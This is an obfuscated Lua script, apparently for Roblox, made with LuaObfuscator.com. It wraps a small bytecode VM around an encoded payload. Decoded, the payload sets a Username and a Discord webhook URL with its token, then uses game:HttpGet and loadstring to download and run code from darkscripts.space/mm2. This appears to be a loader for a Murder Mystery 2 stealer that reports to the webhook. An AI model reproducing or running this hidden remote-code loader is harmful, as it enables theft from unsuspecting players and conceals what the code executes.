--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v88=0;local v89;while true do if (v88==0) then v89=v2(v0(v30,16));if v19 then local v117=0;local v118;while true do if (v117==1) then return v118;end if (v117==0) then v118=v5(v89,v19);v19=nil;v117=1;end end else return v89;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v90=(v31/((570 -(367 + (1471 -(226 + 1044))))^(v32-((8 -6) -(118 -(32 + 85))))))%((1 + 1)^(((v33-(2 -1)) -(v32-(878 -(282 + 595)))) + (1 -0))) ;return v90-(v90%(2 -1)) ;else local v91=(621 -(555 + 64))^(v32-(1 -0)) ;return (((v31%(v91 + v91))>=v91) and (1066 -(68 + 997))) or (931 -(857 + 74)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;return (v36 * (57 + 199)) + v35 ;end local function v23() local v37=957 -(892 + 65) ;local v38;local v39;local v40;local v41;while true do if (v37==((5 -3) -1)) then return (v41 * ((22315877 -10013600) + 4474939)) + (v40 * 65536) + (v39 * (472 -216)) + v38 ;end if (v37==((0 + 0) -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (11 -8) );v18=v18 + (354 -(87 + (1260 -(915 + 82)))) ;v37=953 -(802 + 150) ;end end end local function v24() local v42=v23();local v43=v23();local v44=2 -1 ;local v45=(v20(v43,1 + 0 + 0 ,9 + 11 ) * (((1 + 1) -(885 -(261 + 624)))^(470 -(145 + 293)))) + v42 ;local v46=v20(v43,1208 -(1069 + 118) ,70 -39 );local v47=((v20(v43,11 + 21 )==(1 + 0)) and  -(1 -0)) or (1 + 0) ;if (v46==(1138 -(116 + 1022))) then if (v45==(0 -(0 -0))) then return v47 * (0 -0) ;else v46=1;v44=(1080 -(1020 + 60)) + 0 ;end elseif (v46==2047) then return ((v45==0) and (v47 * ((792 -((1791 -(630 + 793)) + 423))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(3734 -2711) ) * (v44 + (v45/(((67 -47) -(10 + 8))^((490 -291) -147)))) ;end local function v25(v48) local v49=0 -0 ;local v50;local v51;while true do if (v49==(2 + 1)) then return v6(v51);end if (v49==(6 -4)) then v51={};for v111=1748 -(760 + 987) , #v50 do v51[v111]=v2(v1(v3(v50,v111,v111)));end v49=1916 -(15 + 1774 + 124) ;end if (v49==((603 + 164) -(745 + (1076 -(87 + 968))))) then v50=v3(v16,v18,(v18 + v48) -(1 + (0 -0)) );v18=v18 + v48 ;v49=2;end if (v49==(0 -(0 + 0))) then v50=nil;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=3 -2 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99,v100) local v101=(function() return 0;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do local v110=(function() return 0;end)();while true do if (v110~=0) then else if (v101==1) then local v122=(function() return 0;end)();while true do if (v122==0) then while true do if (v92==0) then v93=(function() return v94();end)();if (v95(v93, #":", #"[")==(1784 -(599 + 1185))) then local v176=(function() return 0 + 0 ;end)();local v177=(function() return;end)();local v178=(function() return;end)();local v179=(function() return;end)();while true do if (v176==(1 + 0)) then v179=(function() return {v96(),v96(),nil,nil};end)();if (v177==(1749 -(1013 + 736))) then local v185=(function() return 0;end)();local v186=(function() return;end)();while true do if (v185==0) then v186=(function() return 0;end)();while true do if (v186~=(0 + 0)) then else v179[ #"nil"]=(function() return v96();end)();v179[ #"0313"]=(function() return v96();end)();break;end end break;end end elseif (v177== #"|") then v179[ #"gha"]=(function() return v97();end)();elseif (v177==(4 -2)) then v179[ #"asd"]=(function() return v97() -((7 -5)^16) ;end)();elseif (v177~= #"xnx") then else local v194=(function() return 0;end)();local v195=(function() return;end)();while true do if (v194~=(867 -(550 + 317))) then else v195=(function() return 0;end)();while true do if (v195~=0) then else v179[ #"91("]=(function() return v97() -(2^(22 -6)) ;end)();v179[ #"asd1"]=(function() return v96();end)();break;end end break;end end end v176=(function() return 2 -0 ;end)();end if (v176==(0 -0)) then v177=(function() return v95(v93,287 -(134 + 151) , #"asd");end)();v178=(function() return v95(v93, #"0836",6);end)();v176=(function() return 1;end)();end if (v176~=(1667 -(970 + 695))) then else if (v95(v178, #"{", #"/")~= #"}") then else v179[3 -1 ]=(function() return v98[v179[2]];end)();end if (v95(v178,2,2)~= #">") then else v179[ #"91("]=(function() return v98[v179[ #"91("]];end)();end v176=(function() return 3;end)();end if (3~=v176) then else if (v95(v178, #"asd", #"91(")== #"}") then v179[ #".com"]=(function() return v98[v179[ #"?id="]];end)();end v99[v100]=(function() return v179;end)();break;end end end break;end end return v92,v93,v94,v95,v96,v97,v98,v99,v100;end end end if (v101==0) then local v123=(function() return 0;end)();while true do if (v123==0) then v92=(function() return 1990 -(582 + 1408) ;end)();v93=(function() return nil;end)();v123=(function() return 1;end)();end if (v123==1) then v101=(function() return 1;end)();break;end end end break;end end end end;end)();local v53=(function() return function(v102,v103,v104) local v105=(function() return 0 -0 ;end)();local v106=(function() return;end)();while true do if (v105~=0) then else v106=(function() return 0;end)();while true do if (v106~=(0 -0)) then else local v124=(function() return 0;end)();while true do if (v124~=(0 -0)) then else local v136=(function() return 1824 -(1195 + 629) ;end)();while true do if (v136==0) then v102[v103-#"<" ]=(function() return v104();end)();return v102,v103,v104;end end end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v67= #":",v58 do local v68=(function() return 0 -0 ;end)();local v69=(function() return;end)();local v70=(function() return;end)();local v71=(function() return;end)();while true do if (v68==(242 -(187 + 54))) then v71=(function() return nil;end)();while true do if (1~=v69) then else if (v70== #".") then v71=(function() return v21()~=0 ;end)();elseif (v70==(782 -(162 + 618))) then v71=(function() return v24();end)();elseif (v70~= #"gha") then else v71=(function() return v25();end)();end v59[v67]=(function() return v71;end)();break;end if (v69==0) then local v120=(function() return 0 + 0 ;end)();local v121=(function() return;end)();while true do if ((0 + 0)==v120) then v121=(function() return 0;end)();while true do if (v121==(0 -0)) then local v160=(function() return 0 -0 ;end)();while true do if (v160==(1 + 0)) then v121=(function() return 1637 -(1373 + 263) ;end)();break;end if (v160==0) then v70=(function() return v21();end)();v71=(function() return nil;end)();v160=(function() return 1001 -(451 + 549) ;end)();end end end if (v121~=1) then else v69=(function() return 1;end)();break;end end break;end end end end break;end if (v68~=0) then else v69=(function() return 0 + 0 ;end)();v70=(function() return nil;end)();v68=(function() return 1 -0 ;end)();end end end v57[ #"nil"]=(function() return v21();end)();for v72= #"\\",v23() do FlatIdent_8199B,Descriptor,v21,v20,v22,v23,v59,v54,v72=(function() return v52(FlatIdent_8199B,Descriptor,v21,v20,v22,v23,v59,v54,v72);end)();end for v73= #".",v23() do v55,v73,v28=(function() return v53(v55,v73,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[(406 -(118 + 287)) -0 ];local v65=v61[1386 -(746 + (2500 -1862)) ];local v66=v61[(415 -(15 + 398)) + 1 ];return function(...) local v74=v64;local v75=v65;local v76=v66;local v77=v27;local v78=1 -(1121 -(118 + 1003)) ;local v79= -1;local v80={};local v81={...};local v82=v12("#",...) -(1582 -(1535 + 46)) ;local v83={};local v84={};for v107=0 -0 ,v82 do if ((1812<=3249) and (v107>=v76)) then v80[v107-v76 ]=v81[v107 + (378 -(142 + 235)) ];else v84[v107]=v81[v107 + 1 + 0 ];end end local v85=(v82-v76) + 1 + 0 + 0 ;local v86;local v87;while true do v86=v74[v78];v87=v86[1];if ((1623<=1957) and (v87<=(569 -((1388 -1082) + 56 + 198)))) then if ((4412==4412) and (v87<=(1 + 3))) then if ((1750>=842) and (v87<=(978 -(553 + 424)))) then if ((4372>1850) and (v87>(0 -0))) then if (v84[v86[(926 + 543) -(899 + (1073 -505)) ]]==v86[854 -(20 + 830) ]) then v78=v78 + 1 + 0 + 0 ;else v78=v86[7 -4 ];end else v78=v86[606 -(268 + 335) ];end elseif (v87<=(292 -(60 + 180 + 50))) then do return;end elseif (v87==3) then v63[v86[575 -(426 + 146) ]]=v84[v86[1 + 1 ]];else local v140=1456 -(282 + 1174) ;local v141;local v142;while true do if (v140==(812 -(569 + 242))) then v84[v141 + (2 -1) ]=v142;v84[v141]=v142[v86[1 + 3 ]];break;end if (v140==0) then v141=v86[(598 + 428) -(706 + 318) ];v142=v84[v86[1254 -(721 + 530) ]];v140=1272 -(945 + 326) ;end end end elseif (v87<=6) then if ((232<821) and (v87==5)) then v84[v86[4 -2 ]]();else v84[v86[2 + 0 ]]();end elseif (v87<=(707 -(116 + 155 + 429))) then local v126=v86[2 + 0 + 0 ];v84[v126]=v84[v126](v13(v84,v126 + (1501 -(1408 + 92)) ,v79));elseif (v87==(1094 -(461 + 625))) then v84[v86[1290 -(993 + 295) ]]=v63[v86[(127 -(116 + 10)) + 2 ]];else local v145=v86[2];local v146,v147=v77(v84[v145](v13(v84,v145 + (1172 -(418 + 753)) ,v86[3])));v79=(v147 + v145) -(1 + 0) ;local v148=0 + (0 -0) ;for v161=v145,v79 do local v162=(0 -0) + 0 + 0 ;while true do if (v162==(0 + 0)) then v148=v148 + (530 -(406 + 123)) ;v84[v161]=v146[v148];break;end end end end elseif ((518<902) and (v87<=(1783 -(1749 + 20)))) then if (v87<=(3 + 8)) then if ((2994>858) and (v87>(1332 -(1249 + 73)))) then v84[v86[1 + 1 ]]=v86[1148 -(466 + (1417 -(542 + 196))) ];else do return;end end elseif ((v87<=12) or (3755<=915)) then if (v84[v86[4 -2 ]]==v86[11 -7 ]) then v78=v78 + (1901 -(106 + 1794)) ;else v78=v86[1 + 2 ];end elseif ((3946>3743) and (v87>(4 + 9))) then v63[v86[3]]=v84[v86[5 -3 ]];else v78=v86[7 -4 ];end elseif (v87<=(130 -((8 -4) + 110))) then if ((v87>((175 + 424) -(57 + (1179 -652)))) or (1335>=3306)) then v84[v86[1429 -(41 + 705 + 681) ]]=v63[v86[106 -((82 -65) + 86) ]];else v84[v86[2]]=v86[3 + 0 ];end elseif (v87<=(37 -(8 + 12))) then local v134=v86[5 -3 ];v84[v134]=v84[v134](v13(v84,v134 + ((920 -(239 + 514)) -(122 + 44)) ,v79));elseif (v87>(30 -(5 + 7))) then local v153=v86[6 -4 ];local v154,v155=v77(v84[v153](v13(v84,v153 + 1 ,v86[3 + 0 ])));v79=(v155 + v153) -(1 + 0) ;local v156=(1329 -(797 + 532)) -0 ;for v163=v153,v79 do local v164=(170 -105) -(22 + 8 + 35) ;while true do if (v164==(0 + 0)) then v156=v156 + 1 ;v84[v163]=v154[v156];break;end end end else local v157=(3222 -1965) -((2594 -(1126 + 425)) + 73 + 141) ;local v158;local v159;while true do if ((4844>2253) and (v157==(3 -2))) then v84[v158 + 1 ]=v159;v84[v158]=v159[v86[1216 -(323 + (2089 -1200)) ]];break;end if (v157==(0 -0)) then v158=v86[582 -(361 + 219) ];v159=v84[v86[323 -(53 + 267) ]];v157=1;end end end v78=v78 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031D3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F2Q6D3203083Q00557365726E616D65030A3Q004D61446479593133323403073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F31323936313538353136373132382Q333132372F3065744A50524769786F5F6B35524D543759352Q654A74563567656B3072305F5672346B4F765F3534696F467470505A5F6E4B39753533433469756A772D624D3941692D00143Q00120F3Q00013Q00260C3Q000B0001000200044Q000B0001001208000100033Q001208000200043Q00201200020002000500120F000400064Q0013000200044Q000700013Q00022Q000600010001000100044Q0013000100260C3Q00010001000100044Q0001000100120F000100083Q001203000100073Q00120F0001000A3Q001203000100093Q00120F3Q00023Q00044Q000100012Q00023Q00017Q00",v9(),...);
